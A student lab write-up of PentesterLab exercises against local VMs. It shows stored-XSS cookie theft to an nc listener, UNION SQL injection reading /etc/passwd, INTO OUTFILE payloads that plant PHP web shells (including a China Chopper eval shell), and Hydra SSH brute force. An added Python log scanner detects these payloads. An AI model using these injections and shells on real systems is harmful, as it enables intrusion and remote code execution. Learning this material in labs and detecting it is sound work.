For the SQL injection attacks against the target, see
https://pentesterlab.com/exercises/from_sqli_to_shell/course
http://www.sohu.com/a/126855490_472906
For the XSS attack process against the target, see
https://pentesterlab.com/exercises/xss_and_mysql_file/course
Open the web page at 192.168.179.129: it is a blog system.
Each blog post can be commented on below the post.
Test whether an XSS vulnerability exists. After submitting, a dialog box is displayed:
Next, construct the comment content:
<script>document.write(' ');</script>
At the same time, listen on port 80 with nc on 192.168.179.142.
On the original machine, log in to the admin account with the password p4ssw0rd, then view the comment that was just published.
Then, on machine 142, view what nc received: the cookie has been obtained.
Copy the cookie, open the page containing the comment on machine 142, and change the cookie value to the copied one.
Refresh the page: you are now logged in as admin.
After entering the management interface, you will find that the blog editing page has an SQL injection vulnerability:
http://192.168.179.20/admin/edit.php?id=4 union select 1,2,4
Columns 2 and 3 are displayed.
http://192.168.179.20/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4
The passwd file can be read, but the shadow file cannot. Next we try to write a file.
The error message on the editing page reveals the /var/www/classes directory, and the css directory is found when viewing the page source.
The /var/www/css directory is writable.
Then construct the statement:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%20%,into%20outfile%22/var/www/css/s.php%22
Then open
http://192.168.179.130/css/s.php
It displays:
The s.php file has been written successfully to the /var/www/css directory.
<?php system($_GET['c']); ?>
Write this to z.php by constructing the URL:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%22%,%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22
Access z.php and run uname -a to obtain system information: commands can now be executed remotely.
Next, write a Trojan (web shell) by constructing the URL:
http://192.168.179.130/admin/edit.php?id=2%20union%20select%22%,%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22
China Chopper ("Kitchen Knife") connection:
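The defender's view of the steps above, as an added example that is not part of this lab write-up or the PentesterLab course: a small Python scanner over Apache access-log lines that flags the URL-encoded union select, load_file(, into outfile and <?php payloads sent to edit.php, plus any .php script requested from the static /css/ directory where the shell was dropped. The log lines, client address, timestamps and rule names are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache access-log lines modelled on the requests in this write-up;
# client, timestamps and sizes are made up. Line 1 is benign, lines 2-5 are not.
SAMPLE_LOG = """\
192.168.179.142 - - [10/May/2017:10:01:12 +0800] "GET /admin/edit.php?id=4 HTTP/1.1" 200 2310
192.168.179.142 - - [10/May/2017:10:02:03 +0800] "GET /admin/edit.php?id=4%20union%20select%201,2,3,4 HTTP/1.1" 200 2344
192.168.179.142 - - [10/May/2017:10:02:40 +0800] "GET /admin/edit.php?id=0%20Union%20select%201,2,load_file(%22/etc/passwd%22),4 HTTP/1.1" 200 4012
192.168.179.142 - - [10/May/2017:10:03:15 +0800] "GET /admin/edit.php?id=2%20union%20select%201,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,3,4%20into%20outfile%20%22/var/www/css/z.php%22 HTTP/1.1" 200 2344
192.168.179.142 - - [10/May/2017:10:04:00 +0800] "GET /css/z.php?c=uname%20-a HTTP/1.1" 200 120
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

# (rule name, regex run on the percent-decoded query string); case-insensitive
# because the write-up's payloads mix "Union" and "union".
QUERY_RULES = [
    ("union_select", re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)),
    ("load_file", re.compile(r"\bload_file\s*\(", re.I)),
    ("into_outfile", re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I)),
    ("php_tag", re.compile(r"<\?php", re.I)),
]
# A .php script requested from the static css directory the write-up drops its shell into.
STATIC_PHP_RE = re.compile(r"^/css/.*\.php$", re.I)

def decode(value: str) -> str:
    """Percent-decode twice so one layer of double encoding cannot hide a keyword."""
    return unquote(unquote(value))

def classify(line: str) -> list[str]:
    """Names of every rule the request in this log line triggers ([] = nothing matched)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    path, query = decode(parts.path), decode(parts.query)
    hits = [name for name, rx in QUERY_RULES if rx.search(query)]
    if STATIC_PHP_RE.match(path):
        hits.append("php_in_static_dir")
    return hits

def scan(log_text: str) -> list[tuple[int, list[str]]]:
    """(line number, rule names) for every flagged line of an access log."""
    return [(n, hits) for n, line in enumerate(log_text.splitlines(), start=1)
            if (hits := classify(line))]

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

Only GET query strings appear in the access log, so a shell driven over POST (as the chopper payload is) is caught here by the php_in_static_dir rule, not by its body.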
We found that the machine had SSH enabled, so we used Hydra to brute-force the login:
SSH login
Wu Zekun 201521430028 Lab 5